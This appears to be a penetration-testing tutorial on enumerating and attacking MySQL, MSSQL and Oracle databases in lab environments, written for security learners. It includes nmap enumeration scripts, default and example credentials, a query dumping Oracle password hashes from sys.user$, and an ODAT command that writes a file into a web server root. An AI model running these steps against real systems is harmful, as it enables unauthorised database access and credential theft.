In the ever-evolving landscape of cybersecurity, understanding the intricacies of database exploitation is critical for both attackers and defenders. Databases are the lifeblood of modern applications, and their misconfiguration or vulnerabilities can lead to devastating breaches. This article delves into practical techniques for interacting with MySQL, MSSQL, and Oracle databases focusing on their configurations, commands, and tools that can be leveraged for penetration testing or forensic investigations.

MySQL

Key Port and Configuration

MySQL servers typically operate on port 3306, making it a prime target for attackers scanning networks. To install MySQL on a Linux system, use:

sudo apt install mysql-server -y

Configuration files for MySQL are usually located at /etc/mysql/mysql.conf.d/mysqld.cnf. To view this file without comments or blank lines:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

Connecting to MySQL

To connect to a MySQL server remotely, use:

mysql -u <user> -p<password> -h <IP address>

Note: There should be no space between the -p flag and the password. For example:

mysql -u root -pP4SSw0rd -h 10.129.14.128

Once connected, these commands are essential for database exploration:

• show databases; – Lists all available databases.
• use <database>; – Switches to a specific database.
• show tables; – Displays all tables within the selected database.
• show columns from <table>; – Reveals column names in a table.
• select * from <table>; – Retrieves all data from a table.
• select * from <table> where <column> = “<string>”; – Searches for specific data in a column.

The system schema (sys) and information schema (information_schema) are critical databases that hold metadata about the server’s structure and operations.

Scanning MySQL Servers

To enumerate MySQL services on a target machine, leverage Nmap with the following command:

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

MSSQL: Microsoft’s Enterprise Database

Key Port and Tools

MSSQL operates on port 1433, which is often targeted during reconnaissance. To gather information about an MSSQL server, use Nmap with specialised scripts:

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell \

--script-args mssql.instance-port=1433,mssql.username=sa,mssql.password= \

-sV -p 1433 10.129.201.248

For deeper enumeration, Metasploit offers an auxiliary scanner called mssql_ping, which can provide additional insights into MSSQL instances.

Connecting to MSSQL

Python’s Impacket library includes a powerful tool for MSSQL interaction:

python3 mssqlclient.py [email protected] -windows-auth

Once connected, you can list all databases with:

select name from sys.databases;

Oracle Databases: The Legacy Powerhouse

Key Port and Configuration

Oracle databases utilise port 1521 for their Transparent Network Substrate (TNS) listener service. Configuration files such as tnsnames.ora and listener.ora are typically found in the $ORACLE_HOME/network/admin directory.

Oracle’s default credentials (e.g., CHANGE_ON_INSTALL, dbsnmp) are infamous for being left unchanged in poorly managed environments, making them an easy opportunity during penetration tests.

Essential Commands

After establishing a connection via SQL*Plus or tools like ODAT (Oracle Database Attacking Tool), these commands prove invaluable:

• select table_name from all_tables; – Lists all tables accessible by the user.
• select * from user_role_privs; – Displays roles assigned to the user.
• select name, password from sys.user$; – Accesses user credentials (requires elevated privileges).

Setting Up Oracle Tools

For penetration testers working with Oracle databases, setting up ODAT is straightforward:

sudo apt-get install libaio1 python3-dev alien -y

git clone https://github.com/quentinhardy/odat.git

cd odat/

git submodule init && git submodule update

wget https://download.oracle.com/.../instantclient-basic-linux.x64.zip

unzip instantclient-basic-linux.x64.zip

export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH

export PATH=$LD_LIBRARY_PATH:$PATH

pip3 install cx_Oracle

To test if ODAT is functioning correctly:

./odat.py -h

Exploiting File Upload Vulnerabilities

One notable Oracle vulnerability involves uploading files to the server using UTL_FILE functionality:

echo "Oracle File Upload Test" > testing.txt

./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

curl -X GET http://10.129.204.235/testing.txt

Conclusion: The Stakes of Database Security

Databases like MySQL, MSSQL, and Oracle form the backbone of countless applications worldwide, but they also represent significant attack surfaces when mis-configured or left unpatched. As demonstrated above, understanding how these systems function at a granular level is crucial for both offensive and defensive security professionals.

Whether you’re scanning networks with Nmap or diving deep into schema structures with SQL commands, always remember knowledge is power, but with great power comes great responsibility. Misuse of these techniques could lead to severe legal consequences, so ensure your activities are authorised and ethical.

By securing these critical systems today, we can prevent tomorrow’s breaches because in cybersecurity, it’s not if you’ll be targeted but when.